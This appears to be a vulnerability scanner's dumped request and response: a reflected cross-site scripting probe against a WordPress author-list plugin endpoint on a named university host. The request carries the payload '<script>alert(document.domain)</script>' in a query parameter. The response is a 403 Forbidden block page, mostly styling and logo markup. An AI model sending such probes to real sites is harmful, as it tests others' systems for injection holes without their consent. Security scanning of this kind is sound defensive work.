[knr-widget-xss] Dumped HTTP request for https://ess.science.unimelb.edu.au/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=<script>alert(document.domain)</script>


GET /wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=<script>alert(document.domain)</script> HTTP/1.1
Host: ess.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[knr-widget-xss] Dumped HTTP response https://ess.science.unimelb.edu.au/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=<script>alert(document.domain)</script>

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:17:43 GMT
Server: openresty

<!doctype html>
<html lang="en">

<head>
	<meta charset="utf-8">
	<title>Forbidden</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="robots" content="noindex">
	<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&display=swap" rel="stylesheet">
	<style>
		html {
			display: table;
			height: 100%;
			width: 100%;
			color: #1A1A1A;
		}
	
		body {
			display: table-cell;
			vertical-align: middle;
			margin: 0;
			padding: 5px;
		}
	
		.content {
			padding: 20px;
			border-radius: 20px;
			border: 1px solid #AAAAAA;
			max-width: 700px;
			margin: auto;
			display: flex;
			flex-direction: column;
			gap: 20px;
			box-sizing: border-box;
	
			@media (min-width: 1068px) {
				padding: 50px;
				gap: 30px;
			}
		}
	
		.content__copy {
			display: flex;
			flex-direction: column;
			gap: 10px;
		}
	
		h1,
		h2,
		h3,
		h4,
		h5,
		h6,
		p {
			margin: 0;
		}
	
		h1 {
			color: #1A1A1A;
			font: 700 44px/56px 'Inter', 'Helvetica', sans-serif;
			letter-spacing: -0.2px;
	
	
			@media (min-width: 1068px) {
				font-weight: 700;
				font-size: 58px;
				line-height: 64px;
			}
		}
	
		p {
			color: #1A1A1A;
			font: 400 20px/30px 'Inter', 'Helvetica', sans-serif;
			letter-spacing: -0.2px;
	
	
			@media (min-width: 1068px) {
				font-size: 24px;
				line-height: 36px;
			}
		}
	
		span {
			font: 500 13px/20px 'Inter', 'Helvetica', sans-serif;
			letter-spacing: .2px;
			display: inline-block;
		}
	
		ul {
			list-style: disc;
		}
	
		ol {
			list-style: decimal;
		}
	
		ul,
		ol {
			margin: 0 0 10px 0;
			padding: 0 0 0 30px;
	
			li {
				font: 500 15px/30px 'Inter', 'Helvetica', sans-serif;
				letter-spacing: -0.2px;
	
				@media (min-width: 1068px) {
					font-size: 18px;
					line-height: 32px;
				}
	
				margin-bottom: 0;
			}
		}
	
		.btn {
			appearance: none;
			background: #0057FF;
			border-radius: 27px;
			border: 1px solid #0057FF;
			box-shadow: none;
			box-sizing: border-box;
			color: #ffffff;
			cursor: pointer;
			display: inline-block;
			font: 500 15px/20px 'Inter', 'Helvetica', sans-serif;
			min-width: 163px;
			padding: 16px 28px;
			text-align: center;
			text-decoration: none;
			transition: background 0.05s, border-color 0.05s, color 0.05s;
			transition-timing-function: ease-in-out;
			vertical-align: middle;
			outline: none;
			letter-spacing: .2px;
	
			&:focus,
			&:hover {
				background: #0043eb;
				border-color: #0043eb;
			}
	
			&:focus {
				outline: auto 2px Highlight;
				outline: -webkit-focus-ring-color auto 1px;
			}
		}
	
		.btn.btn-ghost {
			background: none;
			color: #1A1A1A;
			border-color: rgba(26, 26, 26, 0.10);
	
			&:focus,
			&:hover {
				border-color: #1A1A1A;
			}
		}
	</style>
</head>

<body>
	<div class="content">
		<svg width="184" height="33" viewBox="0 0 184 33" fill="none" xmlns="http://www.w3.org/2000/svg">
			<g clip-path="url(#clip0_1459_11794)">
				<path d="M23.8205 15.996C23.8205 12.9062 21.5397 10.3674 18.5755 9.91405C18.1221 6.9498 15.5764 4.66907 12.4935 4.66907C9.41072 4.66907 6.85798 6.9498 6.40462 9.91405C3.44037 10.3674 1.15964 12.9132 1.15964 15.996C1.15964 19.4066 3.9286 22.1756 7.33923 22.1756C8.92946 22.1756 10.3663 21.5549 11.4613 20.5714V26.5069C9.10383 26.2698 6.9068 25.2863 5.20497 23.5915L3.74726 25.0492C6.08378 27.3857 9.18753 28.6691 12.4866 28.6691C15.7856 28.6691 18.8894 27.3857 21.2259 25.0492L19.7682 23.5915C18.0733 25.2863 15.8763 26.2698 13.5188 26.5069V15.996C13.5188 13.7222 15.3671 11.8739 17.6409 11.8739C19.9146 11.8739 21.7629 13.7222 21.7629 15.996C21.7629 18.2698 19.9146 20.1181 17.6409 20.1181C16.8876 20.1181 16.1901 19.9018 15.5833 19.5461V21.799C16.225 22.0361 16.9155 22.1756 17.6409 22.1756C21.0515 22.1756 23.8205 19.4066 23.8205 15.996ZM7.33923 20.1181C5.06547 20.1181 3.21718 18.2698 3.21718 15.996C3.21718 14.0361 4.59119 12.404 6.42554 11.9855C6.89285 14.4755 8.85972 16.4424 11.3497 16.9097C10.9312 18.744 9.29912 20.1181 7.33923 20.1181ZM11.5729 14.8591C9.73853 14.4406 8.36451 12.8086 8.36451 10.8487C8.36451 8.57491 10.2128 6.72661 12.4866 6.72661C14.4395 6.72661 16.0785 8.10063 16.497 9.93498C14.0071 10.4023 12.0402 12.3692 11.5729 14.8591Z" fill="#1A1A1A"/>
				<path d="M36.4432 25.4403C35.1023 25.4403 33.9489 25.1563 32.983 24.5881C32.0227 24.0142 31.2841 23.2188 30.767 22.2017C30.2557 21.1847 30 20.0142 30 18.6903C30 17.3494 30.2585 16.1733 30.7756 15.1619C31.2983 14.1449 32.0398 13.3523 33 12.7841C33.9602 12.2102 35.1023 11.9233 36.4261 11.9233C37.5682 11.9233 38.5682 12.1307 39.4261 12.5455C40.2841 12.9602 40.9631 13.5426 41.4631 14.2926C41.9631 15.0426 42.2386 15.9233 42.2898 16.9347H38.8636C38.767 16.2812 38.5114 15.7557 38.0966 15.358C37.6875 14.9545 37.1506 14.7528 36.4858 14.7528C35.9233 14.7528 35.4318 14.9063 35.0114 15.2131C34.5966 15.5142 34.2727 15.9545 34.0398 16.5341C33.8068 17.1136 33.6903 17.8153 33.6903 18.6392C33.6903 19.4744 33.804 20.1847 34.0312 20.7699C34.2642 21.3551 34.5909 21.8011 35.0114 22.108C35.4318 22.4148 35.9233 22.5682 36.4858 22.5682C36.9006 22.5682 37.2727 22.483 37.6023 22.3125C37.9375 22.142 38.2131 21.8949 38.429 21.571C38.6506 21.2415 38.7955 20.8466 38.8636 20.3864H42.2898C42.233 21.3864 41.9602 22.267 41.4716 23.0284C40.9886 23.7841 40.321 24.375 39.4688 24.8011C38.6165 25.2273 37.608 25.4403 36.4432 25.4403Z" fill="#1A1A1A"/>
				<path d="M47.9473 25.4318C47.1121 25.4318 46.3678 25.2869 45.7143 24.9972C45.0609 24.7017 44.5439 24.267 44.1632 23.6932C43.7882 23.1136 43.6007 22.392 43.6007 21.5284C43.6007 20.8011 43.7342 20.1903 44.0013 19.696C44.2683 19.2017 44.632 18.804 45.0922 18.5028C45.5524 18.2017 46.0751 17.9744 46.6604 17.821C47.2513 17.6676 47.8706 17.5597 48.5183 17.4972C49.2797 17.4176 49.8933 17.3438 50.3592 17.2756C50.8251 17.2017 51.1632 17.0938 51.3734 16.9517C51.5837 16.8097 51.6888 16.5994 51.6888 16.321V16.2699C51.6888 15.7301 51.5183 15.3125 51.1774 15.017C50.8422 14.7216 50.3649 14.5739 49.7456 14.5739C49.0922 14.5739 48.5723 14.7188 48.1859 15.0085C47.7996 15.2926 47.5439 15.6506 47.4189 16.0824L44.0609 15.8097C44.2314 15.0142 44.5666 14.3267 45.0666 13.7472C45.5666 13.1619 46.2115 12.7131 47.0013 12.4006C47.7967 12.0824 48.7172 11.9233 49.7626 11.9233C50.4899 11.9233 51.1859 12.0085 51.8507 12.179C52.5212 12.3494 53.1149 12.6136 53.632 12.9716C54.1547 13.3295 54.5666 13.7898 54.8678 14.3523C55.1689 14.9091 55.3195 15.5767 55.3195 16.3551V25.1847H51.8763V23.3693H51.774C51.5638 23.7784 51.2825 24.1392 50.9303 24.4517C50.578 24.7585 50.1547 25 49.6604 25.1761C49.1661 25.3466 48.595 25.4318 47.9473 25.4318ZM48.9871 22.9261C49.5212 22.9261 49.9928 22.821 50.4018 22.6108C50.8109 22.3949 51.132 22.1051 51.3649 21.7415C51.5979 21.3778 51.7143 20.9659 51.7143 20.5057V19.1165C51.6007 19.1903 51.4445 19.2585 51.2456 19.321C51.0524 19.3778 50.8337 19.4318 50.5893 19.483C50.345 19.5284 50.1007 19.571 49.8564 19.6108C49.6121 19.6449 49.3905 19.6761 49.1916 19.7045C48.7655 19.767 48.3933 19.8665 48.0751 20.0028C47.757 20.1392 47.5098 20.3239 47.3337 20.5568C47.1575 20.7841 47.0695 21.0682 47.0695 21.4091C47.0695 21.9034 47.2484 22.2812 47.6064 22.5426C47.97 22.7983 48.4303 22.9261 48.9871 22.9261Z" fill="#1A1A1A"/>
				<path d="M57.7362 25.1847V12.0938H61.1964V14.4034H61.3499C61.6226 13.6364 62.0771 13.0312 62.7135 12.5881C63.3499 12.1449 64.1112 11.9233 64.9976 11.9233C65.8953 11.9233 66.6595 12.1477 67.2902 12.5966C67.9209 13.0398 68.3413 13.642 68.5516 14.4034H68.6879C68.955 13.6534 69.4379 13.054 70.1368 12.6051C70.8413 12.1506 71.6737 11.9233 72.6339 11.9233C73.8555 11.9233 74.847 12.3125 75.6084 13.0909C76.3754 13.8636 76.7589 14.9602 76.7589 16.3807V25.1847H73.1368V17.0966C73.1368 16.3693 72.9436 15.8239 72.5572 15.4602C72.1709 15.0966 71.6879 14.9148 71.1084 14.9148C70.4493 14.9148 69.9351 15.125 69.5658 15.5455C69.1964 15.9602 69.0118 16.5085 69.0118 17.1903V25.1847H65.4919V17.0199C65.4919 16.3778 65.3072 15.8665 64.9379 15.4858C64.5743 15.1051 64.0942 14.9148 63.4976 14.9148C63.0942 14.9148 62.7305 15.017 62.4067 15.2216C62.0885 15.4205 61.8357 15.7017 61.6482 16.0653C61.4607 16.4233 61.3669 16.8438 61.3669 17.3267V25.1847H57.7362Z" fill="#1A1A1A"/>
				<path d="M79.2268 30.0938V12.0938H82.8064V14.2926H82.9683C83.1274 13.9403 83.3575 13.5824 83.6587 13.2188C83.9655 12.8494 84.3632 12.5426 84.8518 12.2983C85.3462 12.0483 85.9598 11.9233 86.6928 11.9233C87.6473 11.9233 88.528 12.1733 89.3348 12.6733C90.1416 13.1676 90.7865 13.9148 91.2695 14.9148C91.7524 15.9091 91.9939 17.1562 91.9939 18.6562C91.9939 20.1165 91.7581 21.3494 91.2865 22.3551C90.8206 23.3551 90.1842 24.1136 89.3774 24.6307C88.5763 25.142 87.6786 25.3977 86.6842 25.3977C85.9797 25.3977 85.3803 25.2813 84.8859 25.0483C84.3973 24.8153 83.9967 24.5227 83.6842 24.1705C83.3717 23.8125 83.1331 23.4517 82.9683 23.0881H82.8575V30.0938H79.2268ZM82.7808 18.6392C82.7808 19.4176 82.8888 20.0966 83.1047 20.6761C83.3206 21.2557 83.6331 21.7074 84.0422 22.0312C84.4513 22.3494 84.9484 22.5085 85.5337 22.5085C86.1246 22.5085 86.6246 22.3466 87.0337 22.0227C87.4428 21.6932 87.7524 21.2386 87.9626 20.6591C88.1786 20.0739 88.2865 19.4006 88.2865 18.6392C88.2865 17.8835 88.1814 17.2188 87.9712 16.6449C87.7609 16.071 87.4513 15.6222 87.0422 15.2983C86.6331 14.9744 86.1303 14.8125 85.5337 14.8125C84.9428 14.8125 84.4428 14.9688 84.0337 15.2812C83.6303 15.5938 83.3206 16.0369 83.1047 16.6108C82.8888 17.1847 82.7808 17.8608 82.7808 18.6392Z" fill="#1A1A1A"/>
				<path d="M102.409 19.6108V12.0938H106.04V25.1847H102.554V22.8068H102.418C102.122 23.5739 101.631 24.1903 100.943 24.6562C100.262 25.1222 99.4291 25.3551 98.4462 25.3551C97.5712 25.3551 96.8013 25.1562 96.1365 24.7585C95.4717 24.3608 94.9519 23.7955 94.5769 23.0625C94.2075 22.3295 94.02 21.4517 94.0144 20.429V12.0938H97.645V19.7813C97.6507 20.554 97.8581 21.1648 98.2672 21.6136C98.6763 22.0625 99.2246 22.2869 99.9121 22.2869C100.35 22.2869 100.759 22.1875 101.139 21.9886C101.52 21.7841 101.827 21.483 102.06 21.0852C102.298 20.6875 102.415 20.196 102.409 19.6108Z" fill="#1A1A1A"/>
				<path d="M119.436 15.8267L116.112 16.0312C116.055 15.7472 115.933 15.4915 115.746 15.2642C115.558 15.0313 115.311 14.8466 115.004 14.7102C114.703 14.5682 114.342 14.4972 113.922 14.4972C113.359 14.4972 112.885 14.6165 112.499 14.8551C112.112 15.0881 111.919 15.4006 111.919 15.7926C111.919 16.1051 112.044 16.3693 112.294 16.5852C112.544 16.8011 112.973 16.9744 113.581 17.1051L115.95 17.5824C117.223 17.8438 118.172 18.2642 118.797 18.8438C119.422 19.4233 119.734 20.1847 119.734 21.1278C119.734 21.9858 119.482 22.7386 118.976 23.3864C118.476 24.0341 117.788 24.5398 116.913 24.9034C116.044 25.2614 115.041 25.4403 113.905 25.4403C112.172 25.4403 110.791 25.0795 109.763 24.358C108.74 23.6307 108.141 22.642 107.964 21.392L111.536 21.2045C111.643 21.733 111.905 22.1364 112.32 22.4148C112.734 22.6875 113.266 22.8239 113.913 22.8239C114.55 22.8239 115.061 22.7017 115.447 22.4574C115.839 22.2074 116.038 21.8864 116.044 21.4943C116.038 21.1648 115.899 20.8949 115.626 20.6847C115.354 20.4688 114.933 20.304 114.365 20.1903L112.098 19.7386C110.82 19.483 109.868 19.0398 109.243 18.4091C108.624 17.7784 108.314 16.9744 108.314 15.9972C108.314 15.1562 108.541 14.4318 108.996 13.8239C109.456 13.2159 110.101 12.7472 110.93 12.4176C111.766 12.0881 112.743 11.9233 113.862 11.9233C115.516 11.9233 116.817 12.2727 117.766 12.9716C118.72 13.6705 119.277 14.6222 119.436 15.8267Z" fill="#1A1A1A"/>
				<path d="M121.621 30.0938V12.0938H125.2V14.2926H125.362C125.521 13.9403 125.751 13.5824 126.052 13.2188C126.359 12.8494 126.757 12.5426 127.246 12.2983C127.74 12.0483 128.354 11.9233 129.087 11.9233C130.041 11.9233 130.922 12.1733 131.729 12.6733C132.535 13.1676 133.18 13.9148 133.663 14.9148C134.146 15.9091 134.388 17.1562 134.388 18.6562C134.388 20.1165 134.152 21.3494 133.68 22.3551C133.214 23.3551 132.578 24.1136 131.771 24.6307C130.97 25.142 130.072 25.3977 129.078 25.3977C128.373 25.3977 127.774 25.2813 127.28 25.0483C126.791 24.8153 126.39 24.5227 126.078 24.1705C125.765 23.8125 125.527 23.4517 125.362 23.0881H125.251V30.0938H121.621ZM125.175 18.6392C125.175 19.4176 125.283 20.0966 125.498 20.6761C125.714 21.2557 126.027 21.7074 126.436 22.0312C126.845 22.3494 127.342 22.5085 127.927 22.5085C128.518 22.5085 129.018 22.3466 129.427 22.0227C129.837 21.6932 130.146 21.2386 130.356 20.6591C130.572 20.0739 130.68 19.4006 130.68 18.6392C130.68 17.8835 130.575 17.2188 130.365 16.6449C130.155 16.071 129.845 15.6222 129.436 15.2983C129.027 14.9744 128.524 14.8125 127.927 14.8125C127.337 14.8125 126.837 14.9688 126.427 15.2812C126.024 15.5938 125.714 16.0369 125.498 16.6108C125.283 17.1847 125.175 17.8608 125.175 18.6392Z" fill="#1A1A1A"/>
				<path d="M136.408 25.1847V12.0938H139.928V14.3778H140.064C140.303 13.5653 140.704 12.9517 141.266 12.5369C141.829 12.1165 142.476 11.9062 143.209 11.9062C143.391 11.9062 143.587 11.9176 143.797 11.9403C144.008 11.9631 144.192 11.9943 144.351 12.0341V15.2557C144.181 15.2045 143.945 15.1591 143.644 15.1193C143.343 15.0795 143.067 15.0597 142.817 15.0597C142.283 15.0597 141.806 15.1761 141.385 15.4091C140.971 15.6364 140.641 15.9545 140.397 16.3636C140.158 16.7727 140.039 17.2443 140.039 17.7784V25.1847H136.408Z" fill="#1A1A1A"/>
				<path d="M151.185 25.4403C149.838 25.4403 148.679 25.1676 147.708 24.6222C146.742 24.071 145.997 23.2926 145.475 22.2869C144.952 21.2756 144.691 20.0795 144.691 18.6989C144.691 17.3523 144.952 16.1705 145.475 15.1534C145.997 14.1364 146.733 13.3438 147.682 12.7756C148.637 12.2074 149.756 11.9233 151.04 11.9233C151.904 11.9233 152.708 12.0625 153.452 12.3409C154.202 12.6136 154.855 13.0256 155.412 13.5767C155.975 14.1278 156.412 14.821 156.725 15.6562C157.037 16.4858 157.193 17.4574 157.193 18.571V19.5682H146.139V17.3182H153.776C153.776 16.7955 153.662 16.3324 153.435 15.929C153.208 15.5256 152.892 15.2102 152.489 14.983C152.091 14.75 151.628 14.6335 151.1 14.6335C150.549 14.6335 150.06 14.7614 149.634 15.017C149.213 15.267 148.884 15.6051 148.645 16.0312C148.407 16.4517 148.284 16.9205 148.279 17.4375V19.5767C148.279 20.2244 148.398 20.7841 148.637 21.2557C148.881 21.7273 149.225 22.0909 149.668 22.3466C150.111 22.6023 150.637 22.7301 151.245 22.7301C151.648 22.7301 152.017 22.6733 152.353 22.5597C152.688 22.446 152.975 22.2756 153.213 22.0483C153.452 21.821 153.634 21.5426 153.759 21.2131L157.117 21.4347C156.946 22.2415 156.597 22.946 156.068 23.5483C155.546 24.1449 154.87 24.6108 154.04 24.946C153.216 25.2756 152.264 25.4403 151.185 25.4403Z" fill="#1A1A1A"/>
				<path d="M170.055 15.8267L166.731 16.0312C166.674 15.7472 166.552 15.4915 166.364 15.2642C166.177 15.0313 165.93 14.8466 165.623 14.7102C165.322 14.5682 164.961 14.4972 164.541 14.4972C163.978 14.4972 163.504 14.6165 163.117 14.8551C162.731 15.0881 162.538 15.4006 162.538 15.7926C162.538 16.1051 162.663 16.3693 162.913 16.5852C163.163 16.8011 163.592 16.9744 164.2 17.1051L166.569 17.5824C167.842 17.8438 168.791 18.2642 169.416 18.8438C170.041 19.4233 170.353 20.1847 170.353 21.1278C170.353 21.9858 170.1 22.7386 169.595 23.3864C169.095 24.0341 168.407 24.5398 167.532 24.9034C166.663 25.2614 165.66 25.4403 164.524 25.4403C162.791 25.4403 161.41 25.0795 160.382 24.358C159.359 23.6307 158.759 22.642 158.583 21.392L162.154 21.2045C162.262 21.733 162.524 22.1364 162.938 22.4148C163.353 22.6875 163.884 22.8239 164.532 22.8239C165.168 22.8239 165.68 22.7017 166.066 22.4574C166.458 22.2074 166.657 21.8864 166.663 21.4943C166.657 21.1648 166.518 20.8949 166.245 20.6847C165.972 20.4688 165.552 20.304 164.984 20.1903L162.717 19.7386C161.438 19.483 160.487 19.0398 159.862 18.4091C159.242 17.7784 158.933 16.9744 158.933 15.9972C158.933 15.1562 159.16 14.4318 159.614 13.8239C160.075 13.2159 160.72 12.7472 161.549 12.4176C162.384 12.0881 163.362 11.9233 164.481 11.9233C166.134 11.9233 167.436 12.2727 168.384 12.9716C169.339 13.6705 169.896 14.6222 170.055 15.8267Z" fill="#1A1A1A"/>
				<path d="M183.131 15.8267L179.808 16.0312C179.751 15.7472 179.629 15.4915 179.441 15.2642C179.254 15.0313 179.006 14.8466 178.7 14.7102C178.398 14.5682 178.038 14.4972 177.617 14.4972C177.055 14.4972 176.58 14.6165 176.194 14.8551C175.808 15.0881 175.614 15.4006 175.614 15.7926C175.614 16.1051 175.739 16.3693 175.989 16.5852C176.239 16.8011 176.668 16.9744 177.276 17.1051L179.646 17.5824C180.918 17.8438 181.867 18.2642 182.492 18.8438C183.117 19.4233 183.43 20.1847 183.43 21.1278C183.43 21.9858 183.177 22.7386 182.671 23.3864C182.171 24.0341 181.484 24.5398 180.609 24.9034C179.739 25.2614 178.737 25.4403 177.6 25.4403C175.867 25.4403 174.487 25.0795 173.458 24.358C172.435 23.6307 171.836 22.642 171.66 21.392L175.231 21.2045C175.339 21.733 175.6 22.1364 176.015 22.4148C176.43 22.6875 176.961 22.8239 177.609 22.8239C178.245 22.8239 178.756 22.7017 179.143 22.4574C179.535 22.2074 179.734 21.8864 179.739 21.4943C179.734 21.1648 179.594 20.8949 179.322 20.6847C179.049 20.4688 178.629 20.304 178.06 20.1903L175.793 19.7386C174.515 19.483 173.563 19.0398 172.938 18.4091C172.319 17.7784 172.009 16.9744 172.009 15.9972C172.009 15.1562 172.237 14.4318 172.691 13.8239C173.151 13.2159 173.796 12.7472 174.626 12.4176C175.461 12.0881 176.438 11.9233 177.558 11.9233C179.211 11.9233 180.512 12.2727 181.461 12.9716C182.415 13.6705 182.972 14.6222 183.131 15.8267Z" fill="#1A1A1A"/>
			</g>
			<defs>
				<clipPath id="clip0_1459_11794">
					<rect width="183.43" height="32" fill="white" transform="translate(0 0.5)"/>
				</clipPath>
			</defs>
		</svg>
		<div class="content__copy">
			<h1>Error 403 Forbidden</h1>
			<p>You don't have permission to access this resource or your request may have triggered automated protections.</p>
			<p>If you believe this is an error, please contact us with following details for assistance.</p>
			<ul>
				<li>Server Time: 2025-08-06 15:17:43</li>
				<li>Your IP: 74.249.79.49</li>
				<li>Hostname: ess.science.unimelb.edu.au</li>
			</ul>
		</div>
		<div class="cta-container">
			<a class="btn" href="https://campuspress.com/contact-us/" target="_blank">Contact us</a>
		</div>
	</div>
</body>

</html>

